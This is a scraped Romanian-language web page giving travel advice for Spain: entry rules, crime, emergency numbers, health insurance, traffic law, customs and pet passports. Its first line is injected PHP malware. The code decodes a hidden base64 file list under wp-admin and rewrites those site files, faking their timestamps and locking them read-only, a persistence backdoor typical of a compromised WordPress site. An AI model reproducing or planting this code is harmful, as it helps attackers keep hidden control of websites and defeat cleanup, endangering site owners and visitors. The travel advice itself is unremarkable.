$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Spania – O noua atitudine

Spania

 • Nu există restricţii de călătorie.

Ultima actualizare:

18 aprilie 2011

Condiţii de intrare şi regim de şedere

Cetăţenii români nu au nevoie de viză pentru a călători în Spania.
Intrarea în Spania este permisă cu paşaportul sau cartea de identitate în curs de valabilitate.
Pentru verificarea condiţiilor particulare de intrare şi şedere vă recomandăm consultarea informaţiilor oficiale furnizate de Ministerul de Interne al Regatului Spaniei (http://www.mir.es/)

Ministerul Afacerilor Externe recomandă cetăţenilor români care intenţionează să rămână pentru o perioadă îndelungată pe teritoriul acestui stat să se adreseze misiunii diplomatice a României şi să îşi anunţe prezenţa în regiune, comunicând coordonatele personale pentru a putea fi contactaţi în situaţii de urgenţă.

Doriţi să munciţi în Spania?

Nu sunt restricţii pentru cetăţenii romani privind accesarea pieţei muncii in Spania. Informaţii suplimentare puteţi obţine accesând site-ul: http://www.muncainstrainatate.anofm.ro/

Cetăţenii români care au lucrat în statele Uniunii Europene şi solicită, în vederea definitivării dosarului de pensie, documente doveditoare de la instituţiile la care au fost angajaţi, trebuie să se adreseze Casei de Pensii şi Asigurări Sociale de care aparţin. Aceasta este singura instituţie abilitată să ceară sprijinul necesar unei alte instituţii omoloage prin intermediul certificatelor europene existente (în cazul de faţă este vorba de formularul E104, ce vizează totalizarea perioadelor de asigurare).

Ameninţări teroriste

Terorismul este un fenomen global, nelocalizat, prin urmare nici Spania nu poate fi exclusă din faţa acestei ameninţări.
Atacuri şi ameninţări teroriste de amploare redusă au fost înregistrate în 2009 şi în anii precedenţi, preponderent în partea de nord a Spaniei şi în zona oraşului Madrid, toate fiind revendicate de organizaţia bască ETA.
Vă recomandăm să urmăriţi în permanenţă anunţurile şi recomandările făcute de autorităţile spaniole şi să accesaţi periodic pagina web al Ministerului al Afacerilor Externe (www.mae.ro).

Siguranţă şi criminalitate

Spania este o ţară cu un nivel de criminalitate relativ redusă.
Infracţiuni minore de tipul furtului din buzunare, înşelăciunilor sau furtului din maşini pot apărea frecvent în zone aglomerate (gări, staţii, parcări, centre comerciale, benzinării sau zone de servicii pe autostrăzi).

Recomandări generale:

 • Păstraţi în locuri sigure documentele şi valorile personale, biletele de călătorie banii, cărţile de credit şi nu le expuneţi în mod vizibil asupra dumneavoastră sau în maşini.
 • Maşinile trebuie încuiate şi asigurate cu sisteme de alarmă.
 • În cazul călătoriei cu autobuzul sau trenul păstraţi atenţia asupra bagajelor pe întreaga durată a călătoriei.
 • Pentru ieşirile în oraşe, în special în zonele aglomerate, lăsaţi documentele personale la hotel şi păstraţi numai o copie a actelor de identitate (paşaport, permis de şedere).

În cazul unor incidente care afectează siguranţa persoanei sau a bunurilor, vă recomandăm să contactaţi poliţia locală. În cazul pierderii paşaportului românesc, vă recomandăm sesizarea atât a biroului local de poliţie, cât şi a oficiului consular român cel mai apropiat:

În cazul unor incidente grave (accidente, tâlhării), care necesită intervenţia imediată a autorităţilor spaniole, trebuie apelate următoarele numere de urgenţă:

 • 091 – Poliţia
 • 112 – Ambulanţa (SAMUR)
 • 080 – Pompieri

Se recomandă, de asemenea, sesizarea oficiilor consulare române, care pot acorda asistenţa consulară în condiţiile prevăzute de lege.

Atenţie! Dacă sunaţi din greşeală la 112, nu închideţi! În caz contrar, vi se poate trimite o maşină în locul în care vă aflaţi, pentru a vedea dacă totul este în regulă!

Sistemul medical

Asigurarea medicală este obligatorie în Spania.
Vă recomandăm cu insistenţă să încheiaţi o asigurare medicală de sănătate sau să obţineţi Cardul European de Sănătate înainte de a pleca într-o călătorie. Dacă vă îmbolnăviţi sau aveţi un accident pe durata unei şederi temporare într-un stat membru UE, formularul E112 sau Cardul european de asigurări sociale de sănătate vă va da acces la îngrijirile medicale necesare. Acest Card vă va permite să primiţi asistenţa medicală necesară în timpul şederii dumneavoastră temporare în orice ţară a Uniunii Europene. Mai multe detalii găsiţi la adresele : www.cnas.ro şi www.ceass.ro.

Este bine ca asigurarea medicală suplimentară să fie valabilă în toate ţările. În baza unei asemenea asigurări, facultative, aveţi acces la serviciile de urgenţă atât din sistemul public de sănătate, cât şi din cel privat (în funcţie de tipul poliţei de asigurare). La încheierea unei asemenea asigurări verificaţi coordonatele partenerului societăţii de asigurare în ţara de destinaţie şi de tranzit.

Vă recomandăm să vă încheiaţi, înainte de plecare, o asigurare de călătorie. Aceasta are valabilitate în toate ţările şi poate să acopere de la riscurile de bază (îmbolnăviri, accidente, urgenţe stomatologice, repatriere sanitară sau în caz de deces) până la toate riscurile de călătorie, inclusiv pierderea/ furtul/ deteriorarea bagajelor, anularea plecării în străinătate, falimentul companiei aeriene etc.

Asigurarea de viaţă s-a dovedit benefică pentru familiile celor decedaţi în urma unor accidente sau din motive de boală.
În Uniunea Europeană nu aveţi nevoie de vaccinări speciale.

Condiţii privind traficul auto

 • Circulaţia auto:

În Spania, circulaţia auto se efectuează pe partea dreaptă a drumului.
Funcţionează sistemul priorităţii de dreapta.
Accesul pe autostrăzi este permis în baza achitării taxelor specifice. Plata acestor taxe se face la  punctele special amenajate, plasate la intrarea sau la ieşirea de pe autostradă. Costul minim pentru accesul pe autostradă este de 3 euro.

 • Starea drumurilor:

Starea generală a drumurilor şi infrastructurii este foarte bună.

 • Parcarea:

Parcarea este permisă numai în locuri rezervate, contra cost (tichetele se cumpără de la aparatele de taxare din parcare ).

Se recomandă atenţie sporită în timpul opririlor în parcările amenajate pe autostrăzi (în special în timpul nopţii), fiind înregistrate cazuri de furt de autoturisme cu numere de înmatriculare străine, în special în sezonul estival.

 • Centura de siguranţă:

În Spania, centura de siguranţă este obligatorie pentru ocupanţii locurilor din faţă în interiorul localităţilor şi pentru toţi pasagerii în afara localităţilor.

 • Limitele de viteză admise:

– străzi urbane (centrul localităţilor) – 50 km/oră
– drumuri extraurbane (provinciale şi statale) – 90 km/oră
– şosele naţionale – 100 km/oră
– autostrăzi – 110 km/oră.

Depăşirea limitelor de viteză poate atrage aplicarea unor amenzi de până la 1.500 euro şi suspendarea permisului de conducere. Începând cu data de 1 iulie 2006, conform noilor reglementări rutiere, depăşirea cu peste 40 km/oră a limitelor de viteză constituie infracţiune, iar depăşirea vitezei cu mai puţin de 40 km/oră se pedepseşte cu amendă de până la 1.500 euro. Din 2007, s-a introdus un sistem pe puncte de sancţionare a încălcării normelor de circulaţie.

 • Folosirea telefonului mobil la volan:

Este interzisă.

 • Aparatele anti-radar şi de detectare a radarului:

Pe teritoriul Spaniei sunt interzise deţinerea şi utilizarea dispozitivelor de detectare a radarelor, precum şi a aparatelor antiradar. Acestea reprezintă infracţiune şi se pedepsesc cu aplicarea unei amenzi şi a punctelor de penalizare.

 • Permisul de conducere:

Permisul de conducere românesc este valabil în Spania.

 • Informaţii pentru cazurile de accident de circulaţie:

În caz de accident uşor, completaţi, împreună cu cealaltă parte formularul tip pus la dispoziţie de societăţile locale de asigurări, privind producerea accidentului. Notaţi elementele de identificare ale celuilalt autovehicul implicat în accident şi ale societăţii de asigurare a acestuia.

Dacă în urma accidentului sunt răniţi, chemaţi poliţia locală, după ce aţi acordat primul ajutor. Adresaţi-vă pentru sprijin partenerului societăţii române de asigurări din ţara respectivă care figurează pe Cartea verde.
Păstraţi documentele de plată până la înapoierea în ţară pentru a le prezenta societăţii de asigurare.

Telefoane utile pentru informaţii privind traficul sau conduita în caz de accident:

 • Poliţia – 091
 • Ambulanţa – 112

Regimul medicamentelor

Sunt excluse atât la intrare cât şi la ieşire drogurile de orice tip şi substanţele dopante.

Atenţie! Nu luaţi cu dumneavoastră decât cantităţile de medicamente strict necesare!
Vă recomandăm să aveţi la dumneavoastră reţeta medicului pentru medicamentele care depăşesc sfera celor uzuale. Antibioticele nu se eliberează decât pe bază de reţetă.

Reglementări vamale

Nu există controale la graniţele interne, dintre statele semnatare ale Acordului Schengen: Austria, Belgia, Danemarca, Estonia, Finlanda, Franţa, Germania, Grecia, Italia, Letonia, Lituania, Luxemburg, Malta, Olanda, Polonia, Portugalia, Republica Cehă, Slovacia, Slovenia, Spania, Suedia, Ungaria, precum şi Islanda, Norvegia şi Elveţia (ultimele trei nefiind membre ale UE).
Din motive de ordine publică, sănătate publică sau de securitate naţională, la graniţele interne ale UE se pot introduce controale, pentru perioade limitate.

Regimul animalelor de companie

Pentru spaţiul UE, aveţi nevoie de paşaport european pentru animalele de companie. Acest document se poate procura de la medicul veterinar şi trebuie să conţină informaţii despre vaccinarea antirabică.
Animalul trebuie identificat printr-un microcip electronic. Până în iulie 2011, se acceptă, de asemenea, şi un tatuaj lizibil.

By o9admin